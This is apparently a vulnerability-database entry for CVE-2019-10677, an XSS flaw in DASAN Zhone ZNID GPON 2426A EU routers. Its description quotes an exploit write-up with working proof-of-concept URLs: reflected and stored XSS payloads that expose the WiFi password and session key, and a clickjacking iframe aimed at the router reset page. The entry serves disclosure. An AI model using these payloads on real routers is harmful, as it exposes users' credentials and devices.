ID
VAR-201909-1467
CVE
CVE-2019-10677
TITLE
DASAN Zhone ZNID GPON 2426A EU Cross-Site Scripting Vulnerability
Trust: 1.2
DESCRIPTION
Multiple Cross-Site Scripting (XSS) issues in the web interface on DASAN Zhone ZNID GPON 2426A EU version S3.1.285 devices allow a remote attacker to execute arbitrary JavaScript via manipulation of an unsanitized GET parameter: /zhndnsdisplay.cmd (name), /wlsecrefresh.wl (wlWscCfgMethod, wl_wsc_reg). DASAN Zhone ZNID GPON 2426A EU The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. DASAN Zhone ZNID GPON 2426A EU is a wireless router from DASAN Korea. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client code. # Exploit Title: Multiple Cross-Site Scripting (XSS) in DASAN Zhone ZNID GPON 2426A EU # Date: 31.03.2019 # Exploit Author: Adam Ziaja https://adamziaja.com https://redteam.pl # Vendor Homepage: https://dasanzhone.com # Version: <= S3.1.285 # Alternate Version: <= S3.0.738 # Tested on: version S3.1.285 (alternate version S3.0.738) # CVE : CVE-2019-10677 = Reflected Cross-Site Scripting (XSS) = http://192.168.1.1/zhndnsdisplay.cmd?fileKey=&name=%3Cscript%3Ealert(1)%3C/script%3E&interface=eth0.v1685.ppp = Stored Cross-Site Scripting (XSS) = * WiFi network plaintext password http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpaPskKey);// http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(wpaPskKey);// * CSRF token http://192.168.1.1/wlsecrefresh.wl?wlWscCfgMethod=';alert(sessionKey);// = Clickjacking = <html><body><iframe src="http://192.168.1.1/resetrouter.html"></iframe></body></html>
Trust: 2.34
IOT TAXONOMY
| category: | ['IoT'] | sub_category: | - | Trust: 0.6 |
AFFECTED PRODUCTS
| vendor: | dasanzhone | model: | znid gpon 2426a eu | scope: | lte | version: | s3.1.285 | Trust: 1.0 |
| vendor: | dasan zhone | model: | znid gpon 2426a eu | scope: | eq | version: | s3.1.285 | Trust: 0.8 |
| vendor: | dasan | model: | zhone znid gpon 2426a eu <=s3.1.285 | scope: | - | version: | - | Trust: 0.6 |
CVSS
SEVERITY | CVSSV2 | CVSSV3 | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
|
PROBLEMTYPE DATA
| problemtype: | CWE-79 | Trust: 1.9 |
THREAT TYPE
remote
Trust: 0.6
TYPE
xss
Trust: 0.7
CONFIGURATIONS
PATCH
| title: | Top Page | url: | http://www.dasannetworks.com/en/ | Trust: 0.8 |
EXTERNAL IDS
| db: | NVD | id: | CVE-2019-10677 | Trust: 3.2 |
| db: | PACKETSTORM | id: | 154357 | Trust: 2.6 |
| db: | JVNDB | id: | JVNDB-2019-009066 | Trust: 0.8 |
| db: | CNNVD | id: | CNNVD-201909-178 | Trust: 0.7 |
| db: | EXPLOITALERT | id: | 33979 | Trust: 0.6 |
| db: | CNVD | id: | CNVD-2019-30709 | Trust: 0.6 |
| db: | EXPLOIT-DB | id: | 47351 | Trust: 0.6 |
| db: | VULHUB | id: | VHN-142247 | Trust: 0.1 |
REFERENCES
| url: | http://packetstormsecurity.com/files/154357/dasan-zhone-znid-gpon-2426a-eu-cross-site-scripting.html | Trust: 3.1 |
| url: | https://adamziaja.com/poc/201903-xss-zhone.html | Trust: 1.7 |
| url: | https://blog.redteam.pl/2019/09/cve-2019-10677-dasan-zhone-znid.html | Trust: 1.7 |
| url: | https://redteam.pl/poc/dasan-zhone-znid-gpon-2426a-eu.html | Trust: 1.7 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2019-10677 | Trust: 1.5 |
| url: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10677 | Trust: 0.8 |
| url: | https://www.exploitalert.com/view-details.html?id=33979 | Trust: 0.6 |
| url: | https://www.exploit-db.com/exploits/47351 | Trust: 0.6 |
| url: | http://192.168.1.1/wlsecrefresh.wl?wlwsccfgmethod=';alert(wpapskkey);// | Trust: 0.1 |
| url: | https://adamziaja.com | Trust: 0.1 |
| url: | https://dasanzhone.com | Trust: 0.1 |
| url: | http://192.168.1.1/resetrouter.html"></iframe></body></html> | Trust: 0.1 |
| url: | http://192.168.1.1/zhndnsdisplay.cmd?filekey=&name=%3cscript%3ealert(1)%3c/script%3e&interface=eth0.v1685.ppp | Trust: 0.1 |
| url: | http://192.168.1.1/wlsecrefresh.wl?wlwsccfgmethod=';alert(sessionkey);// | Trust: 0.1 |
| url: | http://192.168.1.1/wlsecrefresh.wl?wl_wsc_reg=%27;alert(wpapskkey);// | Trust: 0.1 |
| url: | https://redteam.pl | Trust: 0.1 |
CREDITS
Adam Ziaja
Trust: 0.7
SOURCES
| db: | CNVD | id: | CNVD-2019-30709 |
| db: | VULHUB | id: | VHN-142247 |
| db: | JVNDB | id: | JVNDB-2019-009066 |
| db: | PACKETSTORM | id: | 154357 |
| db: | CNNVD | id: | CNNVD-201909-178 |
| db: | NVD | id: | CVE-2019-10677 |
LAST UPDATE DATE
2024-11-23T22:37:41.806000+00:00
SOURCES UPDATE DATE
| db: | CNVD | id: | CNVD-2019-30709 | date: | 2019-09-06T00:00:00 |
| db: | VULHUB | id: | VHN-142247 | date: | 2019-09-09T00:00:00 |
| db: | JVNDB | id: | JVNDB-2019-009066 | date: | 2019-09-11T00:00:00 |
| db: | CNNVD | id: | CNNVD-201909-178 | date: | 2019-09-10T00:00:00 |
| db: | NVD | id: | CVE-2019-10677 | date: | 2024-11-21T04:19:44.113 |
SOURCES RELEASE DATE
| db: | CNVD | id: | CNVD-2019-30709 | date: | 2019-09-06T00:00:00 |
| db: | VULHUB | id: | VHN-142247 | date: | 2019-09-05T00:00:00 |
| db: | JVNDB | id: | JVNDB-2019-009066 | date: | 2019-09-11T00:00:00 |
| db: | PACKETSTORM | id: | 154357 | date: | 2019-09-04T13:33:33 |
| db: | CNNVD | id: | CNNVD-201909-178 | date: | 2019-09-04T00:00:00 |
| db: | NVD | id: | CVE-2019-10677 | date: | 2019-09-05T14:15:10.973 |